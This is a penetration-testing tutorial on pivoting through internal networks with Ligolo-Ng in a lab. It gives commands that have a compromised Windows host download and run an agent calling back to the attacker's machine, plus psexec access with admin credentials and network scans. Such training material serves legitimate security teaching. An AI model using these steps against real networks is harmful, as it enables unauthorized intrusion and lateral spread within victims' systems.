This comprehensive guide delves into the intricacies of Lateral Movement utilizing Ligolo-Ng, a tool developed by Nicolas Chatelain. The Ligolo-Ng tool facilitates the establishment of tunnels through reverse TCP/TLS connections using a tun interface, avoiding the necessity of SOCKS. This guide covers various aspects, from the tool’s unique features to practical applications such as single and double pivoting within a network.
Download Ligolo-Ng:
Ligolo-Ng can be downloaded from the official repository: Ligolo-Ng Releases.
Table of Contents:
- Introduction to Ligolo-Ng
- Ligolo V/S Chisel
- Lab Setup
- Prerequisites
- Setting up Ligolo-Ng
- Single Pivoting
- Double Pivoting
Ligolo-Ng Overview:
Ligolo-Ng is a lightweight and efficient tool designed to enable penetration testers to establish tunnels through reverse TCP/TLS connections, employing a tun interface. Noteworthy features include its GO-coded nature, VPN-like behavior, customizable proxy, and agents in GO. The tool supports multiple protocols, including ICMP, UDP, SYN stealth scans, OS detection, and DNS Resolution, offering connection speeds of up to 100 Mbits/sec. Ligolo-Ng minimizes maintenance time by avoiding tool residue on disk or in memory.
Ligolo V/S Chisel:
- Ligolo-Ng outperforms Chisel in terms of speed and customization options.
- Chisel operates on a server-client model, while Ligolo-Ng establishes individual connections with each target.
- Ligolo-Ng reduces maintenance time by avoiding tool residue on disk or in memory.
- Ligolo-Ng supports various protocols, including ICMP, UDP, SYN, in contrast to Chisel, which operates primarily on HTTP using a websocket.
Lab Setup
Follow the step-by-step guide for lateral movement within a network, covering both single and double pivoting techniques.
Prerequisites
Obtain the Ligolo ‘agent’ file for Windows 64-bit and the ‘proxy’ file for Linux 64-bit.
Install the ‘agent’ file on the target machine and the ‘proxy’ file on the attacking machine (Kali Linux).
Setting up Ligolo-Ng
Step 1: Following the acquisition of both the agent and proxy files, the next step involves the setup of Ligolo-Ng. To ascertain the current status of Ligolo-Ng configuration, the ‘ifconfig’ command is employed. To initiate activation, execute the prescribed sequence of commands as follows:
ip tuntap add user root mode tun ligolo ip link set ligolo up
Verify Ligolo-Ng activation with: ‘ifconfig’ command
Step2: Unzip the Ligolo proxy file:
tar -xvzf ligolo-ng_proxy_0.5.1_linux_amd64.tar.gz
This proxy file facilitates the establishment of a connection through Ligolo, enabling us to execute subsequent pivoting actions. To explore the full range of options available in the proxy file, utilize the ‘help’ command
./proxy -h
Step 3: The options displayed in the preceding image are designed for incorporating various types of certificates with the proxy. The chosen approach involves utilizing the ‘-selfcert’ option, which operates on port 11601. Execute the provided command, as illustrated in the accompanying image below:
./proxy -selfcert
Step 4: By executing the aforementioned command, Ligolo-Ng becomes operational on the attacking machine. Subsequently, to install the Ligolo agent on the target machine, unzip the ligolo agent file using the command:
unzip ligolo-ng_agent_0.5.1_windows_amd64.zip
To facilitate the transmission of this agent file to the target, establish a server with the command:
updog -p 80
Step 5: In the context of lateral movement, a session has been successfully acquired through netcat. Utilizing the established netcat connection, the next step involves downloading the Ligolo agent file onto the target system. Referencing the image below, execute the provided sequence of commands:
cd Desktop powershell wget 192.168.1.5/agent.exe -o agent.exe dir
Step 6: Evidently, the agent file has been successfully downloaded. Given that the proxy file is presently operational on Kali, the subsequent action involves executing the agent file.
./agent.exe -connect 192.168.1.5:11601 -ignore-cert
Upon executing the specified command, a Ligolo session is initiated. Subsequently, employ the ‘session’ command, opting for ‘1’ to access the active session. Following the session establishment, execute the ‘ifconfig’ command as illustrated in the provided image.
Notably, it discloses the existence of an internal network on the server, denoted by the IPv4 Address 192.168.148.130/24. This discovery prompts further exploration into creating a tunnel through this internal network in the subsequent steps.
Single Pivoting
In the single pivoting scenario, the aim is to access Network B while staying within the boundaries of Network
Attempting a direct ping to Network B reveals, as illustrated in the image below, the impossibility due to different network configuration.
To progress towards the single pivoting objective, a new terminal window will be opened. Subsequently, the internal IP will be added to the IP route, and the addition will be confirmed, as illustrated in the image below, utilizing the following commands:
ip route add 192.168.148.0/24 dev ligolo ip route list
Return to the Ligolo proxy session window and initiate the tunneling process by entering the ‘start’ command, as demonstrated in the provided image.
Upon establishing a tunnel into network B, we executed the netexec command to scan the network B subnet, unveiling an additional Windows 10 entity distinct from DC1, as depicted in the image.
Upon attempting to ping the IP now, successful ping responses will be observed, a contrast to the previous unsuccessful attempts. Additionally, a comprehensive nmap scan can be conducted, as illustrated in the image below.
Double Pivoting
In the process of double pivoting, our objective is to gain access to Network C from Network A, utilizing Network B as an intermediary.
From the newly opened terminal window, utilize the Impacket tool to access the identified Windows 10 with the IP 192.168.148.132. Following this, execute the subsequent set of commands to download the Ligolo agent onto Windows 10
Impacket-psexec administrator:123@192.168.148.132 cd c:\users\public powershell wget 192.168.1.5/agent.exe -o agent.exe dir
Subsequently, initiate the execution of the agent.exe. Upon completion, a session will be established, given that our Ligolo proxy file is already operational.
agent.exe -connect 192.168.1.5:11601 -ignore-cert
Examine Ligolo-ng proxy server, a new session, corresponding to Windows 10, will be present, as indicated in the accompanying image. Execute the ‘start’ command to initiate additional tunnelling.
Execute the ‘session’ command to display the list of sessions. Navigate through the sessions using arrow keys, selecting the desired session for access. In this instance, the aim is to access the latest session, identified as session 2. Select this session and utilize the ‘ifconfig’ command to inspect the interfaces. This action reveals an additional network C interface with the address 192.168.159.130/24, mirroring the details depicted in the image below.
Upon identifying the new network, the initial step involves attempting a ping. However, the image below indicates an absence of connectivity between Kali and the network C.
Add the Network C Subnet in the IP route list with the following command.
ip route add 192.168.159.0/24 dev ligolo ip route list
With the modification of our IP route, the next step involves the addition of a listener to traverse the intra-network and retrieve the session. To incorporate the listener, utilize the following command:
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444
The image above confirms the activation of the listener. To initiate tunneling, refer to available options using the help command. It becomes evident that halting the ongoing tunneling in session 1 is necessary before starting the process in session 2. This step-by-step approach facilitates the transfer of data to the listener, which subsequently retrieves the necessary information. This operational technique, known as double pivoting, involves stopping the initial tunneling in the first session using the ‘stop‘ command. In second session, execute the ‘start‘ command, following the steps illustrated in the image below.
Executing double pivoting was successful, and its verification occurred through the utilization of crackmapexec with the command:
crackmapexec smb 192.168.159.0/24
Discovering Metasploitable2 within the network followed. This led to the ability to conduct a ping and nmap scan, leveraging the acquired network access, as illustrated in the image below: